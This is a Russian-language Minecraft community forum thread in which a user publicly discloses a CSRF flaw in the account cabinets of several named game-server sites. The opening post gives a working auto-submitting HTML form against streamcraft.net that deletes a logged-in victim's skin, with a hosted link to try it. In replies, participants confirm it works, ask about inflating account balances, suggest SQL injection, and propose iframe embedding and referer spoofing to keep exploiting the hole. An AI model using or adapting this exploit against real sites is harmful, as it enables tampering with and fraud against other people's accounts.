Хостинг серверов Minecraft playvds.com
  1. Вы находитесь в русском сообществе Bukkit. Мы - администраторы серверов Minecraft, разрабатываем собственные плагины и переводим на русский язык плагины наших собратьев из других стран.
    Скрыть объявление

CSRF уязвимость на: Всех проектах McLab, MinecraftOnly, Еще много где

Тема в разделе "Обсуждение Minecraft", создана пользователем unlimited, 7 июн 2015.

  1. Автор темы
    unlimited

    unlimited Старожил Пользователь

    Баллы:
    123
    Имя в Minecraft:
    infinity
    Не знаю зачем сейчас копался в streamcraft'е, наткнулся в их личном кабинете на типичную CSRF уязвимость (3 по популярности веб уязвимость в мире).
    Начал смотреть дальше, заражены очень много проектов с горе-паблик-личными-клиентами.
    streamcraft.net
    oneland.su
    frostland.pro
    minecraftonly.ru
    и т.д.

    В кратце с помощью уязвимости можно делать любые вещи в личном кабинете если игрок перейдет по определенной ссылке с вредоносным скриптом на вашем конце.

    Proof of concept - вот небольшой html код
    <form method="POST" action="http://streamcraft.net/cabinet">
    <input type="hidden" name="delskin" value="lol">
    <input type="submit" id="doit" value="Hello">
    </form>
    <script>
    document.getElementById("doit").click();
    </script>

    Размещенный на вашем сайте на вашей ссылке, если человек, авторизованный в лк стримкрафта перейдет по ссылке с таким кодом - его скин автоматически удалится.
    Можете проверить сами - http://starcrack.hol.es/babon/csrf.html
     
  2. Хостинг MineCraft
    <
  3. Plasticable

    Plasticable Старожил Девелопер Пользователь

    Баллы:
    173
    Skype:
    plasticable
    Имя в Minecraft:
    Plasticable
    Проверил, работает
     
  4. Kirich

    Kirich Активный участник Пользователь

    Баллы:
    78
    Уго
     
  5. saharin94

    saharin94 Старожил Пользователь Заблокирован

    Баллы:
    173
    Skype:
    RikkiLooh
    Имя в Minecraft:
    RubukkitDniwe
    "Хорошие" у них кодеры :) Бывает, что в некоторых магазинах можно вещи бесплатно покупать, а то и накручивать деньги на счёте.
     
  6. Kirich

    Kirich Активный участник Пользователь

    Баллы:
    78
    Жаль на stteamcraft нельзя))
     
  7. DEFKALION

    DEFKALION Активный участник Пользователь

    Баллы:
    76
    Такс, а можно ли сделать что бы деньги можно было накрутить? В лс
     
  8. Kirich

    Kirich Активный участник Пользователь

    Баллы:
    78
    Sql инъекция например...
     
  9. Автор темы
    unlimited

    unlimited Старожил Пользователь

    Баллы:
    123
    Имя в Minecraft:
    infinity
  10. saharin94

    saharin94 Старожил Пользователь Заблокирован

    Баллы:
    173
    Skype:
    RikkiLooh
    Имя в Minecraft:
    RubukkitDniwe
  11. VareZzZz

    VareZzZz Старожил Пользователь

    Баллы:
    153
    Skype:
    rockufa
    Имя в Minecraft:
    UfaRock
    Главное то, что теперь все это дело (Описанное выше) не работает. :)

    Это уж точно не про нас.
     
  12. danilko

    danilko Старожил Пользователь

    Баллы:
    103
    Если так, то пихаем в ифрейм и продолжаем использовать дыру)
     
  13. fastin

    fastin Активный участник Пользователь

    Баллы:
    78
    Skype:
    the.infastin
    Мне кажется не надо было создавать эту тему (Пофиксят же)
     
  14. alexandrage

    alexandrage Администратор

    Баллы:
    173
    Skype:
    alexandr0116
    Работает, просто нужно подделать referer. Для этого достаточно юзануть к примеру curl. Потому нужно юзать скрытый токен.
     
  15. fastin

    fastin Активный участник Пользователь

    Баллы:
    78
    Skype:
    the.infastin
    Самая гениальная идея!
     
  16. kDas

    kDas Старожил Пользователь

    Баллы:
    123
    Skype:
    dasjke
    Имя в Minecraft:
    kDasRU
    @VareZzZz, а вы не пробовали использовать что-то нормальное в своих проектах, отличное костыляния вокруг DLE и вообще PHP? :)
     
  17. MySt1k

    MySt1k Старожил Пользователь

    Баллы:
    173
    А зачем? Деньги ведь и так идут
     
  18. fastin

    fastin Активный участник Пользователь

    Баллы:
    78
    Skype:
    the.infastin
    +
     
  19. Warchiefs

    Warchiefs Активный участник Пользователь

    Баллы:
    88
    Имя в Minecraft:
    Warchiefs
    А что ты имеешь ввиду, когда говоришь "и вообще PHP"?
     
  20. scrik78

    scrik78 Старожил Пользователь

    Баллы:
    123
    использовать другой язык программирования
     
  21. Vitto

    Vitto Старожил Пользователь

    Баллы:
    153
    Skype:
    elgardo_de_sanjo
    Имя в Minecraft:
    Vitto
    Зачем, если PHP прекрасно справляется со своей задачей? Тоже самое можно про dle сказать.
    Зачем все усложнять?
     

Поделиться этой страницей